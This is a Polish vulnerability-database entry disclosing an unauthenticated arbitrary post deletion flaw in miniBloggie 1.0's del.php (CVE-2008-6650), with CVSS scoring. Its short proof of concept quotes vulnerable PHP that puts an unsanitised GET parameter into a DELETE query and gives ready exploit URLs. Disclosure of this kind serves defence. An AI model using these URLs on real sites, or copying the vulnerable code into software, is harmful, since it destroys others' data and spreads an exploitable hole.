Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability
2009.04.11
Credit:
Cod3rZ
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-6650
CWE:
CWE-264
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
# MiniBloggie Arbitrary Delete Post Vulnerability # Author: Cod3rZ # Site: http://cod3rz.helloweb.eu # PoC: # if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; # if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; # [...] # elseif ($confirm=="yes") { # [...] # $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; # $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); # Vuln: http://site/del.php?post_id=[postid]&confirm=yes # Ex: http://127.0.0.1/del.php?post_id=1&confirm=yes # Visit http://devilsnight.altervista.org
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top